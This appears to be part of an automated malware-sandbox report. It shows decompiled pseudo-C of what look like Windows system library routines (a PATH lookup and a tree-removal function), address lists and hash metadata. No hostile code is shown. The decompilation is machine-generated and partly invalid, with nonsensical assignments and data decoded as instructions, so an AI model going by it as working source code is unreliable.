									} else {
										L22:
										 *_t271 =  *(_v60 + _t283 * 4);
										 *(_t271 + 0x18) = _t315;
										_t234 =  *(_v60 + _t283 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2959))) {
												case 0:
													__ax =  *0x1e498488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49848c, __ax & 0x0000ffff);
														__eax =  *0x1e498488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1E3EF3E0(_t315, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x1e498480 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e498484,  *0x1e498480 & 0x0000ffff);
													__eax =  *0x1e498480 & 0x0000ffff;
													__eax = ( *0x1e498480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1E3EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1E3EF3E0(_t315, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t330 = _t330 + 0xc;
													_t315 = _t315 + (_t260 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t315 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx =  *0x1e49575c;
													__eflags = __ebx - 0x1e49575c;
													if(__ebx != 0x1e49575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1E3EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1e49575c;
														} while (__ebx != 0x1e49575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1e498478 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49847c,  *0x1e498478 & 0x0000ffff);
													__eax =  *0x1e498478 & 0x0000ffff;
													__eax = ( *0x1e498478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1E4339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1e496e58 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e496e5c,  *0x1e496e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1e496e58 & 0x0000ffff;
													__eax = ( *0x1e496e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t283 = _v16;
													_t301 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t283 = _t283 + 1;
									_v16 = _t283;
									__eflags = _t283 - _v48;
								} while (_t283 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2935))) {
							case 0:
								__ax =  *0x1e498488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E1E3D2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1e498480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1E3BEEF0(0x1e4979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1E3BEB70(__ecx, 0x1e4979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t279 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1e497b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1E3BEB70(__ecx, 0x1e4979a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t327;
										_pop(_t272);
										return E1E3EB640(_t209, _t272, _v8 ^ _t327, _t301, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t269 = E1E3D2E3E(_t267,  &_v36);
									_t279 = _v36;
									_v76 = _t269;
								}
								if(_t279 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t279;
								}
								goto L14;
							case 6:
								__eax =  *0x1e495764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1e498478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1e496e58 & 0x0000ffff;
								__eax = ( *0x1e496e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags = _t234 - 0x3d28661e;
					_push(ds);
					asm("loopne 0x29");
					__eflags = _t234 - 0x3d262e1e;
					 *0x3d26051e =  *0x3d26051e - _t271;
					ds = ds;
					_t275 = ds;
					_push(ds);
					_t235 = _t330;
					_t332 = _t234;
					 *0x415b351e =  *0x415b351e - _t275;
					_push(ds);
					__eflags = _t235 - 0x3d28801e;
					_push(ds);
					__eflags = _t235 *  *_t315 - 0x3d281e1e;
					_push(ds);
					_t324 = _t320 + 1 - 1;
					 *0x3d275d1e =  *0x3d275d1e - _t275;
					_push(ds);
					asm("fcomp dword [ebx+0x41]");
					_push(ds);
					__eflags = 0x28 - 0x415c341e;
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1e47ff00);
					E1E3FD08C(_t275, _t315, _t324);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t276 = _a12;
					__eflags = _t276;
					if(_t276 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t291 = _t242 * 0xc;
							_v48 = _t291;
							__eflags = _t276 -  *((intOrPtr*)(_t291 + 0x1e381664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E1E3EE5C0(_a8,  *((intOrPtr*)(_t291 + 0x1e381668)), _t276);
									_t332 = _t332 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t325 = E1E4251BE(_t276,  *((intOrPtr*)(_v48 + 0x1e38166c)), _a16, _t316, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t316;
									if( *_t287 == _t316) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t287) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t325 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t247 = E1E3B6600( *(_t304 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E1E3D2C50(_t287, _a8, _t276, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t254 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _t325);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E1E3D2C50(_v36, _a8, _t276, _a16, _a20, _t325, 1);
									}
									_v8 = _t316;
									E1E3D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t325;
					}
					L70:
					return E1E3FD0D1(_t240);
				}
				L108:
			}

0x1e3d2584
0x1e3d2586
0x1e3d2590
0x1e3d2596
0x1e3d2597
0x1e3d2598
0x1e3d2599
0x1e3d259e
0x1e3d25a4
0x1e3d25a9
0x1e3d25ac
0x1e3d25ae
0x1e3d25b1
0x1e3d25b2
0x1e3d25b5
0x1e3d25b8
0x1e3d25bb
0x1e3d25bc
0x1e3d25bf
0x1e3d25c2
0x1e3d25c5
0x1e3d25c6
0x1e3d25cb
0x1e3d25ce
0x1e3d25d8
0x1e3d25db
0x1e3d25dd
0x1e3d25de
0x1e3d25e1
0x1e3d25e3
0x1e3d25e9
0x1e3d26da
0x1e3d26da
0x1e3d26dd
0x1e3d26e2
0x1e415b56
0x00000000
0x1e3d26e8
0x1e3d26f9
0x1e3d26fb
0x1e3d26fe
0x1e3d2700
0x1e415b60
0x00000000
0x1e3d2706
0x1e3d2706
0x1e3d270a
0x1e3d270a
0x1e3d270d
0x1e3d2713
0x1e3d2716
0x1e3d2718
0x1e3d271c
0x1e3d271e
0x1e415b6c
0x1e415b6f
0x1e415b7f
0x1e415b89
0x1e415b8e
0x1e415b93
0x1e415b96
0x1e415b9c
0x1e415ba0
0x1e415ba3
0x1e415bab
0x1e415bb0
0x1e415bb3
0x1e415bb3
0x1e415ba3
0x1e3d2724
0x1e3d2726
0x1e3d2729
0x1e3d272c
0x1e3d279d
0x1e3d279d
0x1e3d27a0
0x1e3d27a2
0x00000000
0x1e3d272e
0x1e3d272e
0x1e3d2731
0x1e3d2734
0x1e3d2734
0x1e3d2736
0x1e415bc1
0x1e415bc1
0x1e415bc4
0x00000000
0x1e415bca
0x1e415bca
0x1e415bcd
0x00000000
0x1e415bd3
0x00000000
0x1e415bd3
0x1e415bcd
0x1e3d273c
0x1e3d273c
0x1e3d2742
0x1e3d2747
0x1e3d274a
0x1e3d274d
0x1e3d2750
0x00000000
0x1e3d2756
0x1e3d2756
0x00000000
0x1e3d2902
0x1e3d2908
0x1e3d290b
0x00000000
0x1e3d2911
0x1e3d291c
0x1e3d2921
0x00000000
0x1e3d2921
0x00000000
0x00000000
0x1e3d2880
0x1e3d2887
0x1e3d288c
0x00000000
0x00000000
0x1e3d2805
0x1e3d280a
0x1e3d2814
0x1e3d2816
0x00000000
0x00000000
0x1e3d281e
0x1e3d2821
0x1e3d2823
0x00000000
0x1e3d2829
0x1e3d2829
0x1e3d2831
0x1e3d283c
0x1e3d283e
0x00000000
0x1e3d283e
0x00000000
0x00000000
0x1e3d284e
0x1e3d2850
0x1e3d2851
0x1e3d2854
0x1e3d2857
0x1e3d285a
0x1e3d285c
0x1e3d285d
0x00000000
0x00000000
0x1e3d275d
0x1e3d2761
0x00000000
0x1e3d2767
0x1e3d276e
0x1e3d2773
0x1e3d2773
0x1e3d2776
0x1e3d2778
0x1e3d277e
0x1e3d277e
0x1e3d2781
0x1e3d2781
0x1e3d2783
0x1e3d2784
0x00000000
0x00000000
0x1e415bd8
0x1e415bde
0x1e415be4
0x1e415be6
0x1e415be8
0x1e415be9
0x1e415bee
0x1e415bf8
0x1e415bff
0x1e415c01
0x1e415c04
0x1e415c07
0x1e415c0b
0x1e415c0d
0x1e415c0d
0x1e415c15
0x1e415c18
0x1e415c1b
0x1e415c1b
0x1e415c1e
0x00000000
0x00000000
0x1e3d28c3
0x1e3d28c8
0x1e3d28d2
0x1e3d28d4
0x1e3d28d8
0x1e3d28db
0x1e415c26
0x1e415c28
0x1e415c2d
0x1e415c2d
0x00000000
0x00000000
0x1e415c34
0x1e415c36
0x1e415c49
0x1e415c4e
0x1e415c54
0x1e415c5b
0x1e415c5d
0x1e415c60
0x1e3d2788
0x1e3d2788
0x1e3d278b
0x1e3d278e
0x1e3d278e
0x1e3d278e
0x1e3d2791
0x00000000
0x00000000
0x1e3d2756
0x1e3d2750
0x00000000
0x1e3d2794
0x1e3d2794
0x1e3d2795
0x1e3d2798
0x1e3d2798
0x00000000
0x1e3d2734
0x1e3d272c
0x1e3d2700
0x1e3d25ef
0x1e3d25ef
0x1e3d25ef
0x1e3d25f2
0x1e3d25f8
0x00000000
0x00000000
0x1e3d25fe
0x00000000
0x1e3d28e6
0x1e3d28ec
0x1e3d28ef
0x1e3d28f5
0x1e3d28f8
0x1e3d28f8
0x00000000
0x1e3d28f8
0x00000000
0x00000000
0x1e3d2866
0x1e3d2866
0x1e3d2876
0x1e3d2879
0x00000000
0x00000000
0x1e3d27e0
0x1e3d27e7
0x1e3d27e9
0x1e3d27eb
0x1e415afd
0x00000000
0x1e415afd
0x00000000
0x00000000
0x1e3d2633
0x1e3d2638
0x1e3d263b
0x1e3d263c
0x1e3d263e
0x1e3d2640
0x1e3d2642
0x1e3d2647
0x1e3d2649
0x1e3d264e
0x1e3d2650
0x1e3d2653
0x1e3d2659
0x1e3d26a2
0x1e3d26a7
0x1e3d26ac
0x1e3d26b2
0x1e415b11
0x1e415b15
0x1e415b17
0x00000000
0x1e3d26b8
0x1e3d26b8
0x1e3d26ba
0x1e3d27a6
0x1e3d27a6
0x1e3d27a9
0x1e3d27ab
0x1e3d27b9
0x1e3d27b9
0x1e3d27be
0x1e3d27c1
0x1e3d27c3
0x1e3d27c5
0x1e3d27c7
0x1e415c74
0x1e415c79
0x1e415c79
0x1e3d27c7
0x00000000
0x1e3d26c0
0x1e3d26c0
0x1e3d26c3
0x1e3d26c6
0x1e3d26c6
0x1e3d26c9
0x1e3d26c9
0x00000000
0x1e3d26c9
0x1e3d26ba
0x1e3d265b
0x1e3d265b
0x1e3d265e
0x1e3d2667
0x1e3d266d
0x1e3d2677
0x1e3d267c
0x1e3d267f
0x1e3d2681
0x1e415b49
0x1e415b4e
0x1e3d27cd
0x1e3d27d0
0x1e3d27d1
0x1e3d27d2
0x1e3d27d4
0x1e3d27dd
0x1e3d2687
0x1e3d2687
0x1e3d268a
0x1e3d268b
0x1e3d268e
0x1e3d268f
0x1e3d2691
0x1e3d2696
0x1e3d2698
0x1e3d269d
0x1e3d269f
0x00000000
0x1e3d269f
0x1e3d2681
0x00000000
0x00000000
0x1e3d2846
0x00000000
0x00000000
0x1e3d2605
0x1e3d260a
0x1e3d260c
0x1e3d2611
0x1e3d2616
0x1e3d2619
0x1e3d2619
0x1e3d261e
0x00000000
0x1e3d2624
0x1e3d2627
0x1e3d2627
0x00000000
0x00000000
0x1e415b1f
0x00000000
0x00000000
0x1e3d2894
0x1e3d289b
0x1e3d289d
0x1e3d28a1
0x1e415b2b
0x1e415b2e
0x1e415b2e
0x1e3d28a7
0x1e3d28a9
0x1e415b04
0x1e415b09
0x1e415b09
0x1e415b09
0x00000000
0x00000000
0x1e415b35
0x1e415b3c
0x1e3d28fb
0x1e3d28fb
0x1e3d26cc
0x1e3d26cc
0x1e3d26d0
0x00000000
0x1e3d26d2
0x1e3d26d2
0x00000000
0x1e3d26d2
0x00000000
0x00000000
0x1e3d25fe
0x1e3d292d
0x1e3d292d
0x1e3d2930
0x1e3d2935
0x1e3d2937
0x1e3d293c
0x1e3d293d
0x1e3d293f
0x1e3d2946
0x1e3d294d
0x1e3d294e
0x1e3d2950
0x1e3d2951
0x1e3d2951
0x1e3d2952
0x1e3d2958
0x1e3d295b
0x1e3d2960
0x1e3d2963
0x1e3d2968
0x1e3d2969
0x1e3d296a
0x1e3d2970
0x1e3d2971
0x1e3d2974
0x1e3d2977
0x1e3d297c
0x1e3d297d
0x1e3d297e
0x1e3d297f
0x1e3d2980
0x1e3d2981
0x1e3d2982
0x1e3d2983
0x1e3d2984
0x1e3d2985
0x1e3d2986
0x1e3d2987
0x1e3d2988
0x1e3d2989
0x1e3d298a
0x1e3d298b
0x1e3d298c
0x1e3d298d
0x1e3d298e
0x1e3d298f
0x1e3d2990
0x1e3d2992
0x1e3d2997
0x1e3d29a3
0x1e3d29a6
0x1e3d29ab
0x1e3d29ad
0x1e3d29b0
0x1e3d29b2
0x1e415c80
0x1e3d29b8
0x1e3d29b8
0x1e3d29bb
0x1e3d29c0
0x1e3d29c5
0x1e3d29c6
0x1e3d29c6
0x1e3d29c9
0x1e3d29cb
0x00000000
0x00000000
0x1e3d29cd
0x1e3d29d0
0x1e3d29d9
0x1e3d29db
0x1e3d29dd
0x1e3d2a7f
0x1e3d2a84
0x1e3d2a87
0x1e3d2a89
0x1e415ca1
0x1e415ca3
0x00000000
0x1e3d2a8f
0x1e3d2a8f
0x00000000
0x1e3d2a8f
0x00000000
0x1e3d29e3
0x1e3d29e3
0x1e3d29e3
0x00000000
0x1e3d29e3
0x1e3d29dd
0x00000000
0x1e3d29db
0x1e3d29e6
0x1e3d29e9
0x1e3d29eb
0x1e3d29ed
0x1e3d29f3
0x1e3d29f5
0x1e3d29f8
0x1e3d29fa
0x1e3d2a97
0x1e3d2a9a
0x1e3d2a9d
0x1e3d2add
0x00000000
0x1e3d2a9f
0x1e3d2aa2
0x1e3d2aa5
0x1e3d2aa8
0x1e3d2aab
0x1e415cab
0x1e415caf
0x1e415cc5
0x1e415cda
0x1e415cdc
0x1e415cdf
0x1e415ce5
0x00000000
0x1e415ceb
0x1e415ced
0x1e415cee
0x00000000
0x1e415cee
0x1e415cb1
0x1e415cb4
0x1e415cb9
0x1e415cbb
0x00000000
0x1e415cbd
0x1e415cbd
0x00000000
0x1e415cbd
0x1e415cbb
0x1e3d2ab1
0x1e3d2ab1
0x1e3d2ac4
0x1e3d2ac6
0x1e3d2ac6
0x00000000
0x1e3d2ac6
0x1e3d2aab
0x00000000
0x1e3d2a00
0x1e3d2a09
0x1e3d2a0e
0x1e3d2a21
0x1e3d2a24
0x1e3d2a35
0x1e3d2a3a
0x1e3d2a3d
0x1e3d2a42
0x1e3d2a59
0x1e3d2a59
0x1e3d2a5c
0x1e3d2a5f
0x1e3d2a5f
0x1e3d29fa
0x1e3d29f3
0x1e3d2a64
0x1e3d2a64
0x1e3d2a6b
0x1e3d2a6b
0x1e3d2a6d
0x1e3d2a72
0x1e3d2a72
0x00000000

Strings

PATH, xrefs: 1E3D2642, 1E3D2691

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
Instruction ID: ca3ba7ddd2bbc8decde1601b7282267ecc70d950a386f2030515d9f234ffeaec
Opcode Fuzzy Hash: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
Instruction Fuzzy Hash: 87C1A0B6D00319DBDB14CF99D880AADB7B5FF48B20F85461AE801BB250E775A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AF900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3AF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
